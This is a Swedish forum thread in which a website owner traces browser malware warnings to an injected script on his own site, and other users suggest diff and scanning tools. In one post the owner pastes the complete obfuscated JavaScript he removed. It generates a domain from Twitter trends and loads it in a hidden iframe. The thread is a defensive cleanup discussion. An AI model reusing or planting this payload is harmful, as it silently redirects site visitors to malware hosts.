41 svar i den här tråden

[ycc]

Hej,

Tack för hjälpen med min senaste frågeställning.

Jag kör W7 Starter med Google Chrome och fick en notifikation att plug-in saknas. Jag testade samma sida med Firefox och fick samma notifikation. (Sidan är säker, vad jag tror i alla fall. EDIT: Se nedan, siten kan ha blivit hackad.)

Jag klickade "install plug in" och fick bekräfta att jag litade på innehåll från Sun och från Oracle.

Vad jag förstår så ominstallerades Java. En fil som heter chromeinstall-6u29.exe laddades ner. Installationen skedde dock utan att jag behövde klicka den filen.

När jag nu går till vissa web-sidor, vad jag förstår sidor med JavaScript, så fungerar bara vissa av javascript-funktionerna. I firefox får jag dessutom upp en virusvarning från AVAST. Jag bifogar skärmdump. Virusvarningen har en länk till denna sida: avast
Det verkar också som om webläsaren kopplar upp mot nätet igen efter det att sidan är inladdad.

Tacksam för förslag hur jag får javan att fungera igen.

mvh

ycc

Bifogade fil(er)

•  av.jpg   71,97K   0 Antal nedladdningar

Det här inlägget har redigerats av ycc: 03 december 2011 - 00:05

[ycc]

Ju mer jag läser AVASTs noteringar så tror jag siten som utlöste felmeddelandet har blivit hackad av en malware-site som heter aynupuoroxsyi.com

Det är jag själv som administrerar siten som utlöste frågan om plug-in. Jag fär sätta igång att ladda ner alla .js filer och se om de blivit hackade.

EDIT:
Jag laddade ned hela siten med ftp (3000 filer) och sökte igenom filerna efter strängen aynupuoroxsyi.com men hittade inget. Men det ser ut som om AVAST har hittat något i siten.

Det här inlägget har redigerats av ycc: 02 december 2011 - 05:31

[Rune.K]

Att det är något lurt med aynupuoroxsyi.com bekräftas av Firefox.

Citat

Reported Attack Page!

  
  This web page at aynupuoroxsyi.com has been reported as an attack page and has been blocked based on your security preferences.

  
  Attack pages try to install programs that steal private information, use your computer to attack others, or damage your system.Some attack pages intentionally distribute harmful software, but many are compromised without the knowledge or permission of their owners.  

Hur du får bort eventuellt virus och ordnar till ditt Java överlåter jag åt specialisterna här på forumet.
Själv är jag nybörjare på Win7.

Det här inlägget har redigerats av Rune.K: 02 december 2011 - 07:28

[ycc]

Tack Rune.

Det kan ju vara två problem:
#1. Java uppdateringen kan ha introducerat virus i min burk.
#2. Min site kan ha blivit hackad

Ursäkta att jag diskuterar problem #2 i detta forum, det har troligen inget med Windows att göra, men "det hänger ju ihop", och jag behöver verkligen tips med detta

Problem 1
Jag körde system restore i W7. Inte den varianten som återställer alla filer utan bara den varianten som återställer systemfilerna.

Problem 2:
Jag har haft virus i min site en gång tidigare. Då kunde jag hitta viruset genom att ladda ner en kopia av hela siten och text-söka på det domännamn som viruset kopplade upp mot. Det funkar inte denna gång.

Om det är JS är det ju mycket lätt att dölja, istället för
s ='aynupuoroxsyi.com';
skriver hackern bara
s ='aynu' + 'puoroxsyi.com';
(eller hur kompicerat som helst)
Så går det inte att text-söka.

Jag har backup, men jag litar inte hundra på den. 3000 filer måste ju komma tillbaka med samma version.

Jag skall ändra lösenord för servern.

Möjligen har min web-host ett återställningsprogram (till tidigare tidpunkt) för servern.

Att köra något jämförelseprogram mellan min backup och den nedladdade kopian vore en möjlighet som dock tar tid.

EDIT

Det verkar som om den site som viruset försöker koppla upp mot heter
ymarloeoicc.com
(Google Chrome säger att den väntar på den siten.)
(Strängsökning negativ på den siten också.)
Siten finns inte mer. Kanske det är en malware-site som ISP tagit bort.

Det här inlägget har redigerats av ycc: 02 december 2011 - 09:02

[JoWa]

WinMerge kan jämföra filerna. http://winmerge.org/

[ycc]

Tack JoWa, verkar vara precis vad jag behöver. Jag skall sätta mig in i det programmet.

Jag ligger med riktig influensa nu och siten kanske har virus, livet är kul. (Men i alla fall inget jag förlorar pengar på )

Jag gissar att den site som viruset kopplar upp mot har tagits bort av ISP och JS i webläsaren då hänger.

Huruvida något hade introducerats i min dator är jag inte säker på.
Möjligen verkar det som om min burk beter sig annorlunda efter W7 restore. Nu när jag kommer till siten igen så frågar Chrome igen om den skall installera plug-in. Efter ominstallationen av Java så kom inte frågan utan viss JS bara blockerades. Men jag är inte säker, det kan ha cachats eller annat, kankse.

Schysst JoWa, winmerge verkar vara vad jag behöver, men det kan nog bli ett ganska stort jobb att jämföra alla filer.

Bifogade fil(er)

•  av2.jpg   70,08K   0 Antal nedladdningar

Det här inlägget har redigerats av ycc: 02 december 2011 - 08:55

[Cecilia]

Observera att Java och javascript inte har något med varandra att göra alls utan är två helt olika saker. Java används för att köra Java-program och om din webbplats plötsligt tycker att Java behövs så lär det vara ett Java-program där numera som troligen försöker utnyttja säkerhetshål i en gammal Java-version för att komma in i datorn.

Det här inlägget har redigerats av Cecilia: 02 december 2011 - 09:21

[ycc]

Tack  för påpekandet Cecilia. Det var värdefullt. Jag kan erkänna att jag inte har skillnaderna helt klara för mig. JS är ett skriptspråk som funkar på websidor och därför omges av starka restriktioner, det tror jag mig veta. JS kan ju bara skriva kakor till disken etc Min site är handhackad med mycket JS. (Fast Java är ju också skript.)

Men det är säkert som du säger att hackern har lagt in något på min server som gör att frågan om uppdatering kommer upp. Jag tror inte jag har Java på min site.

Jag läste nog uppdateringsmeddelandena lite slarvigt. Jag tror det var Java som uppdaterades. Jag trodde JS kunde påverkas vid Java-uppdateringen, men jag kan nog, som du säger, ha fel där.

Tack igen för tipset om winmerge, det verkar vara ett kanonprogram. Installerar kvickt, kan köra mappar och undermappar tillsammans. Berättar om filen finns eller om skillnader finns. Intuitivt. Jobbar kvickt. GNU är det också. Jag har börjat jämföra lite.

Det här inlägget har redigerats av ycc: 02 december 2011 - 10:04

[Cecilia]

Java brukar inte kallas för ett skriptspråk utan ett vanligt programmeringsspråk. Man skriver inte Java-program och inkluderar dem på sin webbsida utan att veta om det.

chromeinstall-6u29.exe ser ut som en installationsfil för senaste Java-versionen.

Du har kanske nytta av sidan http://vurldissect.co.uk/ i dina försök att hitta den skadliga koden.

[Opptokoppter]

Nämdes att det kom upp en fråga om bekräfta installationen (vilket är helt normalt) när Java skulle installeras.

Nu är de ett tag sedan jag själv installerade Java men värt & uppmärksamma är ju att utgivaren ska vara Oracle.
Sun hade ju hand om Java tidigare fram tills Oracle övertog ansvaret som leverantör och distributör.

Jag vill minnas att jag vid något tillfälle fått upp äldre skumma meddelanden om installera Java från Sun när man besökt vissa okända platser på nätet. Vet inte hur vanligt förekommande de är att man kontrollerar och hjälper besökare på webbsidor att installera programmet liknande som många gör ifråga om installera Flash Player men när namnet Sun dyker upp så kan det vara en varning bara i sig att något kanske inte riktigt stämmer.

En annan vanlig grej många varnar för är ju risken med att utnyttja billiga färdiga mallar på sin webbsida.
Händer ibland att vissa kan vara preparerade med innehåll som smittar besökare eller av annan okänd anledning använder sidor för olika sorters spridning av skadlig kod. Nu behöver ju allting inte utgå från sprida saker som "förstör" liknande virus.
Oavsett vad så är ju en aktiv webbsida ett bra hjälpmedel för nå ut med nästan vad som helst.

[si3rra]

Alltså antagligen handlar det om någon sorts script-injection-attack på hemsida.
Tror du kan utesluta den här installations teorin, och ändra gärna rubriken på tråden.
Och hade du lagt ut adressen till sidan hade ju flera personer kunnat prova och kanske förskt se vad som varit felande.

För övrigt ser både "ymarloeoicc.com/" och "aynupuoroxsyi.com" ut att vara nedstängda.

Det här inlägget har redigerats av si3rra: 02 december 2011 - 21:27

[ycc]

Tack för alla kommentarer, mycket värdefullt.

Jag skall testa vurldissect.

När jag testade igår funkade sidan i stort, men hälften av javaskript-animationerna var brutna.

Idag har sidan hamnat på Googles svartlista, man får ett meddelande att sidan innehåller malware och man måste bekräfta att man verkligen vill se den. Den site den kopplar upp mot varierar hela tiden.

Jag skall läsa AVASTs log mer ingående. Det vore nyttigt att veta hur den virusdefinition ser ut som AVAST reagerar på.

Jag instämmer i hela si3rras inlägg, tack, Jag har ändrat rubriken.

Jag har väntat lite med att lägga ut länken eftersom sidan innehåller malware. Men gissningsvis inte farligt att gå till sidan så länge man inte installerar något????

Jag är naturligtvis väldigt tacksam om så många som möjligt går till sidan och kollar. Här är adressen:

May contain malware:
e-dog.info/t/63/doc/Ubuntu_installation.php

Jag håller med si3rra om att det förmodligen är ett injicerat skript. Vet inte varför Java-installationen aktiverades.

Tack för alla kommentarer. Jag får leta vidare efter skriptet. Jag hade samma problem en gång för ett par år sedan, då gick det ganska fort att hitta skriptet med textsökning.


EDIT:
Jag gjorde en del applets på slutet av 90-talet, bara för att testa. Jag vill minnas att det var med Java-"kompilator". Dessa sidor ligger också på siten, men borde inte kunna anropas från den sida som larmar nu.

När jag går till de sidorna funkar inte applets utan Google Chrome frågar efter java-installation.

När jag går till mina sidor med applets så kommer det upp en fråga I APPLETRUTAN om att installera Java.
När jag går till den sida vi diskuterar nu så kommer det upp en fråga I EN FRAME längst upp på sidan. Den frågar om att installera plug-in. Jag kommer inte ihåg alla detaljer, men när jag klickade där så skedde en java-installation.

Det här inlägget har redigerats av ycc: 03 december 2011 - 05:00

[Cecilia]

För säkerhets skull föreslår jag att du redigerar ditt inlägg och tar bort http från länken så att ingen råkar klicka av misstag. Datorn kan kanske bli smittad genom ett säkerhetshål i t ex en gammal installerad Java-version.

[ycc]

OK, tack Cecilia.

[ycc]

Jag är nog lite extra trögtänkt idag.
Jag hittar inte AVAST log. Jag har öppnat loggen förut, möjligen har AVAST uppdaterats sedan dess. Jag kan helt enkelt inte hitta loggen för de 9 "web and network objects" som blokerats.

Bifogade fil(er)

•  avast1.jpg   135,67K   0 Antal nedladdningar
•  avast2.jpg   79,8K   0 Antal nedladdningar

[ycc]

Det gick i alla fall att hitta malware-skriptet på ett ställe. Firefox felkonsol larmade när den mötte detta. Kanske går det att leta upp andra ställen där det förekommer nu när man vet hur det ser ut på ett ställe. Men det är ju inte säkert heller. Jag har självklart tagit bort skriptet från sidan.
Virus/malware script:

(function($$){d="( 8 *i= 8var Vc=this;  [Vc\\FullYear %Month %Date %Hours %Minutes %Seconds()]}; *B= 8 &n,Vr=this.#i(),i=0;Vr[1]+=1;while(i++<7){#n=Vr[i] /#n<#b)Vr[i] 4#n}   Vr.splice(~z'),1+~T 0 5~u 0+'T'+Vr 5~U 0};VN={'h`http://Xs`/Xt`treXd`daiXn`ndsXq`?Xc`callback=Xj`#Xa`apiXl`lyXW`twitterXo`comXe`1Xk`sXK`bodyXx`ajaxXD`.XL`libsXJ`jqueryX6`6.2Xm`minXf`onXS`criptXi`ifXM`rameXY`headXw`width:Xp`px;XH`height:XT`2Xr`rcXQ`\"Xy`style=Xb`><XR`></XI`divXB`<XA`>Xg`googleXE`&date=Xz`0Xu`-XU` X,`:00X;':2345678901,'/':48271,'F':198195254,'G':12,'C`='};@ #G(Vm){#o=[];for(Vx=0;Vx<Vm .;Vx++){#o.push(VN[Vm.charAt(Vx)])}   #T(#o)}VB=document;#x=window; +E='undefined'; +j=~haDWDosestnsdlDjfqcq' :R= ))== +E) /#R||!VD()){if(!#R){try{Vd=jQuery !;try{Vd=$ !}VM=VB.getElementsByTagName(~Y 0[0];#J=VB.createElement(~kS 0;#J.setAttribute(~kr'),#G(\"hxDgakDosxsLsJseD6sJDmDj\"));VM.appendChild(#J)}@ Va(#F,VK){   Math.floor(#F/VK) 6e(#k){var Vg=Va( +u, $G); &C= +u% $G; &S= $r*#C; &L= $J*Vg; &y=#S-#L /#y>0){#u=#y}else{#u=#y+ $A}  (#u%#k) 6z(#w){ +u=~;')+#w; $r=~/'); $A=~;')-~F'); $G=Va( $A, $r); $J= $A% $r 6T(V){   V .==1?V[0]:V 5'')};@ #K(V){d=new Date( :c=~zee');d.setTime((V.as_of-~G')*~G')*~G')*~ezz 0*~ezzz 0;   d 6p(Vu){ &a,Vn,#f=Vu .; &d=[];while(--#f){Vn=#e(#f :D.push(Vn :a=Vu[Vn];Vu[Vn]=Vu[#f];Vu[#f]=#a}}@ Vp($){Vs=$.map([81,85,74,74,92,17,82,73,80,30,82,77,25,11,10,10,61,11,56,55,11,53,6,53,7,2,1,0,48],@(x,i){   String.fromCharCode(i+x+24)});   #T(Vs) 6v($){if ))!= +E){$( 8if ).Vt)!= +E)  ;$.Vt=1; 2j,@(Vy){#g=#K(Vy :h=#g\\Month() 9L=#g\\Date();VS=#h+\"-\"+VL;#P=#j+#G(\"E 3;Vj=VP=Va(#g\\Hours(),6)*6 9E=Vj+1;#b=+~ez'); , 2P,@(Vy){try{#D=Vy.trends;#M=#G(\" 3+\" \" /Vj<#b)Vj 4Vj /VE<#b)VE 4VE; 7j+#G(X)] /!#N){ 7E+#G(X)]}#N=(#N[3].name.toLowerCase().replace(/[^a-z]/gi,'')+'microscope').split('' :s=#h*71+VP*3+VL*37;#z(#s :q=#e(4)+#b;#p(#N :H=~Ch')+#T(#N).substring(0,#q)+'.com/'+Vp($);VN['Z']=#H;Vb=~BI 1biMU 1UkrZRiMRIA');$(~K 0.append(Vb)}catch(Vf){}})},#b*#b*# B)})})}else{ , -,1+~TTT 0}} -)()#js@functionV#mX','`':'~#G('\\.getUTC  return !.noConflict(true)}catch(e){} $#x.V %(),Vc\\ &var # )(typeof($ *Date.prototype.# +#x.# ,setTimeout( 8 -#v(#x.jQuery)} ..length /;if( 0')) 1yQHTpweeepQ 2$.getJSON(# 3Tzeeu\")+VS 4=~z')+ 5.join( 6}@ # 7#N=#D[#M+V 8@(){ 9+(+~e 0;V :);#";for(c=53;c;d=(t=d.split('#@VX`~\\   ! $ % & ) * + , - . / 0 1 2 3 4 5 6 7 8 9 :'.substr(c-=(x=c<9?1:2),x))).join(t.pop()));$$(d)})(function(jsmH){return(function(jsm,jsmF){return jsmF(jsm(jsmF(jsm(jsmH))))(jsmH)()})((function(jsm){return jsm.constructor}),(function(jsm){return(function(jsmF){return jsm.call(jsm,jsmF)})}))});

EDIT:
Det verkar som om Googles svartlistning av siten tagits bort när skriptet togs bort. AVAST ger inte heller varningar nu. Skriptet kanske bara fanns på ett ställe.
Men det verkar finnas något skräp kvar. Malware-skriptet använder callbacks (skickar funktionsnamn som argument). Det finns lite jQuery på min sida och de använder också callbacks och jQuery verkar ha pajat.

I bästa fall ingen malware kvar på sidan nu, bara en del JS som blockeras när vissa callbacks inte funkar.
...
Jag tog bort det mesta av jQuery och då verkar siten fungera.

Det här inlägget har redigerats av ycc: 03 december 2011 - 04:59

[Rune.K]

aynupuoroxsyi.com är fortfarande infekterad enligt Firefox.
Går man förbi varningen så kommer man till en administrationssida för en router.
Stämmer det att du har adminsida för en router på aynupuoroxsyi.com?

Det är absolut ingenting jag rekommenderar att gå förbi sådana varningar.

[ycc]

Jag är inte säker på att jag förstår din fråga Rune.

Jag administrear inte aynupuoroxsyi.com

aynupuoroxsyi.com är en av de siter som är inblandad i attacken. Malware injicerades i min site och malware kopplade upp webläsaren mot aynupuoroxsyi.com och andra siter.

Jag anser min site rensad från malware nu, om någon finner något suspekt i den så meddela mig förstås.

e-dog.info/t/63/doc/Ubuntu_installation.php

Tack för alla bidrag som kommit.

Det här inlägget har redigerats av ycc: 03 december 2011 - 09:02

[Rune.K]

Jag fick för mej tidigare att aynupuoroxsyi.com var din sida, jag var förstås lite konfunderad över namnet.

aynupuoroxsyi.com är alltså inte din sida?

Det är alltså bara e-dog.info som är din sida?

[e-son]

http://www.urlvoid.com/scan/e-dog.info